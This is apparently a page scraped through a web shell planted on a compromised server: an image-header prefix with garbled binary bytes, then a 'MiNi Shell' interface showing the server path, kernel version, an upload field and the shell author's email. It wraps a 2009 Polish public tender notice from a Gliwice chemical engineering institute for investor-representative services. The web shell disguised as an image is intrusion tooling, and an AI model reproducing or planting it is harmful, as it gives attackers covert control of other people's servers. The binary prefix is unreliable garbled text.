JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090409/99640-N-2009.html

<p class="kh_header"><b>Gliwice: Wykonanie czynności Inwestora Zastępczego przy realizacji inwestycji: Modernizacja pracowni i laboratoriów Instytutu oraz termomodernizacja hali technologicznej i pawilonu laboratoryjnego</b><br>
<b>Numer ogłoszenia: 99640 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Inżynierii Chemicznej PAN , ul. Bałtycka 5, 44-100 Gliwice.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iich.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut naukowo badawczy, placówka PAN.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie czynności Inwestora Zastępczego przy realizacji inwestycji: Modernizacja pracowni i laboratoriów Instytutu oraz termomodernizacja hali technologicznej i pawilonu laboratoryjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Do obowiązków Inwestora Zastępczego należeć będzie kompleksowa obsługa realizacji inwestycji, w latach 2009-2010, wraz z jej rozliczeniem w tym:
1.	Opracowanie dokumentacji projektowej i kosztorysowej w zakresie niezbędnym do zrealizowania planowanej inwestycji budowlanej (szczegółowa charakterystyka obiektów Instytutu wraz z planowanym zakresem prac jest opisana w załączniku nr 5) z uwzględnieniem obowiązujących przepisów charakterystyki energetycznej budynków,
2.	Opracowanie, w terminie 45 dni od daty podpisania umowy, w oparciu o zatwierdzoną przez Inwestora dokumentację projektowo - kosztorysową, dokumentacji niezbędnej do przeprowadzenia postępowania o udzielenie zamówienia publicznego, zgodnie z ustawą Prawo zamówień publicznych, na realizację inwestycji,
3.	Opracowanie szczegółowego harmonogramu finansowo - rzeczowego inwestycji w porozumieniu z zamawiającym,
4.	Stała współpraca z zamawiającym na etapie przygotowania dokumentacji projektowo - kosztorysowej,
5.	Przekazanie, przy udziale zamawiającego, placu budowy dla wykonawcy robót,
6.	Sprawowanie nadzoru inwestorskiego, we wszystkich branżach, nad kompleksową realizacją inwestycji zgodnie z prawem budowlanym, przepisami wykonawczymi,  zasadami działania inspektora nadzoru oraz zasadami BHP i p.poż ,
7.	Koordynowanie prac między branżami w sposób niezakłócający pracy Instytutu, zwłaszcza w obszarze prowadzonych badań naukowych Instytutu, egzekwowanie ustaleń wynikających z harmonogramu inwestycji oraz weryfikowanie faktur,
8.	Dokonanie czynności odbioru  końcowego inwestycji, w szczególności Inwestor Zastępczy zobowiąże się również do:
a.	stwierdzenia gotowości do odbioru,
b.	powołania w uzgodnieniu z zamawiającym komisji odbiorowych,
c.	dokonania odbiorów częściowych oraz odbioru końcowego od wykonawcy oraz przekazania przedmiotu odbioru zamawiającemu,
d.	przekazania zamawiającemu protokołów odbioru robót i dokumentacji powykonawczej,
9.	Sprawdzanie faktur wykonawcy robót oraz dokumentów załączonych do rozliczania inwestycji,
10.	Opracowanie Ogólnych Warunków Umowy w porozumieniu z zamawiającym,
11.	Reprezentowanie zamawiającego przed organami administracyjnymi, złożenie wniosku o przyjęcie zgłoszenia budowy lub wykonania robót budowlanych nie wymagających i/lub wymagających decyzji o pozwoleniu na budowę,
12.	Udział w postępowaniu o udzielenie zamówienia publicznego na realizację inwestycji, w szczególności:
a.	udział w pracach komisji przetargowej,
b.	niezwłoczne odpowiadanie na pytania wykonawców oraz zajmowanie stanowiska wobec ewentualnych wnoszonych protestów,
c.	ocena ofert - opracowanie raportu dla zamawiającego,
13.	Uczestnictwo w komisjach powołanych przez zamawiającego do oceny jakości robót w okresie gwarancji i rękojmi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.00.00-5, 71.63.00.00-3, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 5 000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
1.	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający będzie oceniał spełnienie warunków wg kryterium spełnia/nie spełnia.

Z ubiegania się o udzielenie zamówienia publicznego wyklucza się wykonawców, którzy:
1.	nie spełniają warunków udziału w postępowaniu o udzielenie zamówienia publicznego, o których mowa w art. 24 ust. 1 ustawy prawo zamówień publicznych,
2.	wykonywali bezpośrednio czynności związane  z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podst. art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2,
3.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
4.	nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków, z zastrzeżeniem  art. 26 ust. 3.
5.	nie wnieśli wadium, o ile zamawiający wymaga jego wniesienia, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

Zamawiający odrzuca ofertę, która:
1.	jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia z zastrzeżeniem art. 87 ust. 2 pkt 3,
2.	jej złożenie stanowi czyn nieuczciwej konkurencji w zrozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
3.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
4.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert,
5.	zawiera błędy w obliczeniu ceny,
6.	w terminie 3 dni od daty otrzymania zawiadomienia wykonawca nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt 3,
7.	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawcy posiadają uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo składania ofert,
2.	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
3.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
W celu potwierdzenia warunku, posiadania niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia, wykonawca przedkłada następujące dokumenty:
1.	Wykaz wykonanych usług pełnienia funkcji Inwestora Zastępczego lub co najmniej inspektora nadzoru inwestorskiego przy realizacji inwestycji o wartości co najmniej 4 000 000 PLN, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz wartości inwestycji, przedmiotu usługi (Inwestor Zastępczy lub co najmniej inspektor nadzoru inwestorskiego), okresu wykonania i odbiorców, wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie  - Zał. nr 3 do SIWZ.
Zamawiający wymaga, aby wykonawca wykazał się przynajmniej 2 usługami tego rodzaju, w tym przynajmniej jedną usługą pełnioną podczas robót w budynkach użyteczności publicznej.
2.	Wykaz wykonanych usług pełnienia funkcji Inwestora Zastępczego lub co najmniej inspektora nadzoru inwestorskiego przy realizacji inwestycji w palcówkach naukowych, bez względu na wartość usługi i wartość inwestycji, wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie  - Zał. nr 3 do SIWZ.
Zamawiający wymaga, aby wykonawca wykazał się przynajmniej jedną usługą tego rodzaju.
3.	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia do pełnienia funkcji inspektora nadzoru bez ograniczeń w branży:
	budowlanej,
	sanitarnej (wentylacyjnej),
	elektrycznej
oraz zaświadczenia o przynależności do izb samorządu zawodowego.

W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, wykonawca składa następujące dokumenty:
1.	polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, z sumą ubezpieczenia co najmniej 300 000 PLN. 
Inne dokumenty wymagane:
1.	formularz ofertowy zgodnie ze wzorem - Zał. nr 1 do SIWZ,
2.	oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu - Zał. nr 2 do SIWZ.
Dokumenty, o których mowa winy być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.iich.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Inżynierii Chemicznej PAN
ul. Bałtycka 5
44 100 Gliwice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 10:00, miejsce: Instytut Inżynierii Chemicznej PAN
ul. Bałtycka 5
44 100 Gliwice
sekretariat pok. 212.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com